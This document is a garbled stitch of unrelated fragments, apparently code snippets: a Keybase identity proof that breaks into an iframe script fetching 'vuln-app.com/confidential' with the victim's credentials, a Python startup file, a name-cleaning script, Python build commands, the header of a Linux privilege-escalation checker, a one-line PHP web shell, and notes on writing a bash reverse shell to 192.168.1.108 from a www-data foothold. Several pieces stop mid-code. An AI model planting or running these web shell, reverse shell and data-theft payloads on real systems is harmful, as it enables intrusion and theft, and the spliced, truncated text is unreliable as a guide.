I hereby claim:
- I am avicoder on github.
- I am avicoder (https://keybase.io/avicoder) on keybase.
- I have a public key ASA5E3ToP1__j0WJ0hVsfEKPF-t9pWa1Ka31uZpGM32rawo
To claim this, I am signing this object:
<html>
<body>
<iframe src='data:text/html,<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://vuln-app.com/confidential", true);
xhr.withCredentials = true;
xhr.onload = function () {
  if (xhr.readyState === xhr.DONE) {
    console.log(xhr.response);
  }

# Store this file in ~/.pystartup,
# set "export PYTHONSTARTUP=/home/user/.pystartup"
#
# Note that PYTHONSTARTUP does *not* expand "~", so you have to put in the
# full path to your home directory.
import atexit
import os
import readline
import rlcompleter

#!/usr/bin/env python
import sys
if __name__ == "__main__":
    if len(sys.argv) != 2:
        # Parenthesised form works under both Python 2 and Python 3
        print("usage: %s names.txt" % (sys.argv[0]))
        sys.exit(0)
    for line in open(sys.argv[1]):
        # Keep only letters and spaces from each line
        name = ''.join([c for c in line if c == " " or c.isalpha()])

curl -OL http://www.python.org/ftp/python/2.7.11/Python-2.7.11.tgz
tar xzvf Python-2.7.11.tgz
cd Python-2.7.11
./configure --prefix=/usr/local --enable-shared
make
make install

#!/usr/bin/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.

<?php
system($_GET['cmd']);
?>

I faced an issue while executing any command using the .run command, as it doesn't support white spaces and raises an exception (for example, ls index.html).
I figured it out by creating a .sh file with a limited-privilege session (www-data) in the /html directory.
echo "#! bin/bash" > abc.sh
echo $'\n' >> abc.sh
echo "bash -i >& /dev/tcp/192.168.1.108/443 0>&1" >>abc.sh
chmod +x abc.sh
Now in hexchat execute: